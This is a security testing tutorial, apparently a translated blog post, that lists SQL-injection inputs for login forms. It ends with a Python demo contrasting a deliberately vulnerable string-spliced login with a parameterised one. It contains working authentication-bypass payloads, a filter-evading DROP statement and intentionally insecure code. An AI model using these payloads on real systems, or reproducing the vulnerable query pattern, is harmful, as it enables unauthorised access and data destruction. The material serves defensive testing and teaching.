SQL in All Its Forms 01 - POST

    The first input fields I like to test on a site are the "search engine" and the "login form"; the example below tests a "login form". In production you should aim to suppress any error messages and server responses, and leave them to the developers for debugging. We will assume the receiving script has a worst-case SQL statement:

      SELECT *
      FROM users
      WHERE username='<submitted_username>'
      AND password='<submitted_password>'

    1. Random SQL: enter some random SQL-like values as input and see what message the server returns.

    Username:     SELECT Username FROM Users WHERE ID=1
    Password:     SELECT MD5(Password) FROM Users WHERE ID=1

     -- evaluates to:
    SELECT * FROM users WHERE username='SELECT Username FROM Users WHERE ID=1' AND password='SELECT MD5(Password) FROM Users WHERE ID=1'

    Result should be "invalid username/password". Suppress any other messages.

    2. Wildcards: enter an asterisk (*) as the input value and observe the result.

    Username:     *
    Password:     <Leave Blank>

     -- evaluates to:
    SELECT * FROM users WHERE username='*' AND password=''

    Result should be "invalid username/password".

    3. Comments - dashdash: enter a known username (e.g. admin) as input, followed by a comment sequence (e.g. --).

    Username:     admin'--
    Password:     <Leave Blank>

     -- evaluates to:
    SELECT * FROM users WHERE username='admin'--' AND password=''

    Result should be "invalid username/password".

    4. Comments - hash: enter a known username (e.g. admin) as input, followed by a comment sequence (e.g. #).

    Username:     admin'#
    Password:     <Leave Blank>

     -- evaluates to:
    SELECT * FROM users WHERE username='admin'#' AND password=''

    Result should be "invalid username/password".

    5. Comments - bypassing pattern matches: tests whether the target system screens for keywords such as DROP, or blocks them with a blacklist.

    Username:     ';DR/**/OP tempTable;
    Password:     <Leave Blank>

     -- evaluates to:
    SELECT * FROM users WHERE username='';DROP tempTable;' AND password=''

    6. The Classic: enter ' OR 1=1-- as the input value, substituting a username you know exists for "admin".

    Username:     admin
    Password:     ' or 1=1--

     -- evaluates to:
    SELECT * FROM users WHERE username='admin' AND password='' OR 1=1--'

    Quick variations of this:  # which one applies mainly depends on the error that comes back; then use the matching variant against the specific application
    admin' --
    admin' #
    admin'/*
    ' or 1=1--
    ' or 1=1#
    ' or 1=1/*
    ') or '1'='1--
    ') or ('1'='1--

    7. Variations of the Classic: Comments. Depending on the system, try entering comment syntax, substituting a username you know exists for "admin".

    Username:     admin
    Password:     ' or 1=1 --IamJOE

     -- evaluates to:
    SELECT * FROM users WHERE username='admin' AND password='' OR 1=1 --IamJOE'

    8. Variations of the Classic: Empty. Enter a value such as ' or ''=' , substituting a username you know exists for "admin".

    Username:     admin
    Password:     ' or ''='

     -- evaluates to:
    SELECT * FROM users WHERE username='admin' AND password='' OR ''=''

    9. Variations of the Classic: NewLines. Some scripts cannot parse a newline: it is treated as a separate query, or the script trims the last line submitted. Substitute a username you know exists for "admin".

    Username:     admin
    Password:     '
                  OR 1=1--

     -- evaluates to:
    SELECT * FROM users WHERE username='admin' AND password=''
                  OR 1=1--'

    **New lines in SQL should be understood as .

    10. Variations of the Classic: URL Encoded. Even where the quote (') is escaped, this is the most likely way for an attack to get through a system. In fact, every attack on this page can be URL-encoded. Enter %27%20or%20%27%27%3D%27 as the input value.

    Username:     admin
    Password:     %27%20or%20%27%27%3D%27

     -- evaluates to:
    SELECT * FROM users WHERE username='admin' AND password='' OR ''=''

    11. Guest Password: if you know a valid username/password, check that your scripts do not validate on the password alone (blank password).

    Username:     Guest
    Password:     <Password you know exists in system>

     -- evaluates to:
    SELECT * FROM users WHERE username='Guest' AND password='<known_password>'
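The checklist above is only useful if you can see which of these inputs a login routine actually accepts. The block below is an added example (not code from the original post): it builds the page's `users` table in an in-memory SQLite database with constructed sample accounts, implements the worst-case string-spliced query beside a parameterised one, and runs the page's inputs through both so the difference is visible. Note that the page's "evaluates to" lines assume MySQL-style comment syntax; SQLite rejects the `#` comment with a syntax error, so that case fails on the dialect rather than on the check, which is exactly the kind of dialect dependence to keep in mind when reading results. The table, account names and passwords are assumptions made here for the demo.

```python
import sqlite3
from typing import Callable, Dict, List

# Constructed sample accounts (not from the page) for the in-memory database.
SAMPLE_USERS = [("admin", "s3cret"), ("Guest", "guest"), ("alice", "wonderland")]


def build_db() -> sqlite3.Connection:
    """Create the users table that the page's worst-case query selects from."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS
    )
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The pattern the page assumes: input spliced straight into the SQL text."""
    sql = (
        f"SELECT * FROM users WHERE username='{username}' "
        f"AND password='{password}'"
    )
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        # Malformed input (e.g. the MySQL-style '#' comment, which SQLite rejects)
        # raises here. The client must only ever see "invalid username/password",
        # so the error is swallowed; in real code it would be logged server-side.
        return False


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised query: the same values are bound as data, never parsed as SQL."""
    row = conn.execute(
        "SELECT * FROM users WHERE username=? AND password=?", (username, password)
    ).fetchone()
    return row is not None


# The page's test inputs as (label, username, password). None of them is a real
# credential for the sample accounts, so a correct login routine rejects every one.
CHECKLIST = [
    ("random sql", "SELECT Username FROM Users WHERE ID=1",
     "SELECT MD5(Password) FROM Users WHERE ID=1"),
    ("wildcard", "*", ""),
    ("comment dashdash", "admin'--", ""),
    ("comment hash", "admin'#", ""),
    ("classic", "admin", "' or 1=1--"),
    ("classic comment text", "admin", "' or 1=1 --IamJOE"),
    ("classic empty", "admin", "' or ''='"),
    ("classic newline", "admin", "'\nOR 1=1--"),
]

LoginFn = Callable[[sqlite3.Connection, str, str], bool]


def run_checklist(login: LoginFn) -> Dict[str, bool]:
    """Return {label: True if that input was accepted as a login} for each case."""
    conn = build_db()
    try:
        return {label: login(conn, user, pw) for label, user, pw in CHECKLIST}
    finally:
        conn.close()


def bypasses(login: LoginFn) -> List[str]:
    """Labels of the checklist cases that the given login routine wrongly accepts."""
    return [label for label, accepted in run_checklist(login).items() if accepted]


if __name__ == "__main__":
    print("vulnerable_login bypassed by:", bypasses(vulnerable_login))
    print("safe_login bypassed by:      ", bypasses(safe_login))
    print("real credentials still work: ", safe_login(build_db(), "admin", "s3cret"))
```

Running it shows the spliced query accepted by the dashdash comment, the classic, its comment-text, empty-string and newline variants (the trailing `--` or the `OR ''=''` clause rewrites the WHERE condition), while the parameterised version rejects all of them and still accepts the real `admin` credentials. The `#` case is rejected by SQLite's parser rather than by the check, which is why the page's advice to suppress error messages matters: a raw syntax error returned to the client would reveal that the input reached the database.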
Original source: https://www.cnblogs.com/Jdrops/p/5369620.html